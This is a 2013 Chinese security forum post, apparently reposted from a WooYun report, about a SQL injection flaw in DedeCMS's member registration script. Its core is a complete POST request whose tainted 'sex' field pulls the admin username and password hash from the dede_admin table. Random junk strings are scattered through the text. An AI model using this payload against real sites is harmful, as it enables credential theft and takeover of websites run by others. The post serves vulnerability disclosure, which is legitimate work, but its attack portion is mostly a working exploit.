找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2200|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞, Y2 f/ l) i9 N9 v  V
简要描述:
5 p$ W6 v; N6 E
' @1 `4 J4 W$ I2 Z9 @需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
* H& [& u% W% c1 e- v0 Q原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
8 d; ?) E* G" L1 l, r1 M5 M) ^详细说明:跟这个漏洞
6 L' ^( V1 h  u* C& s& }   j& S0 f$ C* {* F0 B
WooYun: Dedecms SQL注射导致审核机制绕过漏洞" {: b1 @& \4 \& W" ?
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的." C6 k" Y0 h/ Y3 y  i
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
* m. d5 p# ?& a- o 4 U* ^2 y$ _/ F5 a4 v. [+ J. L
www.political-security.com/member/reg_new.php' @" Q4 N& q, \4 m2 v  i

! d% c( C8 P( T4 S$ [$ p, _POST
  Z; b& x# |4 w4 i9 @- w # z  e" r8 J3 R' }% V
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&* S- H6 O* L5 n9 [1 W
userid=c4rp3nt3r&uname=c4rp3nt3r
2 N7 O+ t1 X* f&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
4 ~3 M; P, ^; Z) E3 q; Z, n, ~+ a&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,2 @% N' ^* }! G0 L+ Z; L' Z
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
1 a% o: G, \/ F; K/ z%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表